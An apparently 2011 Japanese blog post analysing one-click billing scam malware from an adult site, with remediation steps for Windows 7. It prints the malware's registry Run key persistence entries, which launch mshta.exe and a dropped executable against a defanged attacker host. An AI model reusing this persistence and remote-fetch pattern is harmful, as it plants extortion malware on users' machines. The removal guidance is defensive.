ノートパソコン dynabook が 
5万円台から♪ あー、ウイルス実行しちゃった。あなたが訪問したとところは単なるウイルス配信サイトです。ウイルスを感染させる直前に表示された警告をなんで無視したんですか? 拡張子もちゃんと見ましたか? どこからどう見ても動画ファイルの拡張子ではなかったでしょ。たとえば「*.avi」「*.wmv」とかが動画の形式。エッチな映像見たさにヘラヘラしてましたか?
この手のソフトは入れてたけどスルーしたって? そりゃ、どこぞの島国のたかだか1サイトの超ローカルウイルスなんぞ対応してません。手動でウイルス実行 → 即感染! 
ウイルスの実行ボタンを押し下げる蛮行 ⇒ 請求登録画面がデスクトップに表示される、パソコン再起動しても消えない、3日以内と支払期限カウントダウン ⇒ 家族にばれる前に早く消さないとヤバイ ⇒ 料金を支払って詐欺師ウハウハ大儲け
■ 『有料アダルトサイトへのご入会ありがとうございます。』
[12月追記1...] 攻撃者がウイルス感染挙動を変更したため診断結果と作業内容を修整
[12月追記2...] 攻撃者がウイルス感染挙動を再び変えた可能性もあるため新記事も用意
[12月追記2...] 攻撃者がウイルス感染挙動を再び変えた可能性もあるため新記事も用意
レジストリ HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run に
2 つのデータを確認しました [2011/12/** 16:02]
【キー2】
名前: SystemBootaFH82iZUJlViSAN1NggyQttUrIDZQEfo
データ: C:\Users\[ユーザー名]\UserProfile\SystemBoot.lnk
└ C:\Users\[ユーザー名]\UserProfile\htmlapp.exe h**p://knein15k.info/reg2.php?cccid=aFH82iZUJlViSAN1NggyQttUrIDZQEfo
怪しさ ⇒ 0 ポイント
更新日時 ⇒ .lnk ファイル要確認 2011/12/** 15:56:57
【キー1】
名前: RegWriteaFH82iZUJlViSAN1NggyQttUrIDZQEfo
データ: C:\Users\[ユーザー名]\SoftRecovery\RegWrite.lnk
└ C:\Windows\System32\mshta.exe h**p://knein15k.info/set_inf2.php?cccid=aFH82iZUJlViSAN1NggyQttUrIDZQEfo
怪しさ ⇒ 20 ポイント
更新日時 ⇒ .lnk ファイル要確認 2011/12/** 15:56:57
■ ■ ■ ■ ■ ■ ■ ■ ■ ■
OS環境: Windows 7
有料アダルト動画エロサイトの登録入会料金請求画面が消えない.exe v111217
http://blogs.yahoo.co.jp/noooo_spam/59949792.html
■ ■ ■ ■ ■ ■ ■ ■ ■ ■
- 診断結果の確認 【~ が消えない.exe】
- ウイルスにより投下された該当の.lnkファイルの2つをゴミ箱へ 【ファイル検索、エクスプローラ】 ※
- ウイルスにより登録されたレジストリRunキー部分の該当項目の2つを削除 【レジストリエディタ】 ※
- パソコンを再起動して反省会
※ 隠しフォルダ・隠しファイルで生成されるので要設定変更
> http://support.microsoft.com/kb/2453311
> http://support.microsoft.com/kb/2453311
※ 怪しさ判定が不完全なタイプ(1つ目は20ポイントも、2つ目が0ポイント)なので、.lnkファイルの更新日時(=感染日時)の一致と、投下場所での自己判断が必要。こちらでは午後3時56分にウイルス実行して感染させた形。
> Windows Vista/7 → C:\Users\ユーザー名\ ~
> Windows XP → C:\Documents and Settings\ユーザー名\ ~
> Windows Vista/7 → C:\Users\ユーザー名\ ~
> Windows XP → C:\Documents and Settings\ユーザー名\ ~
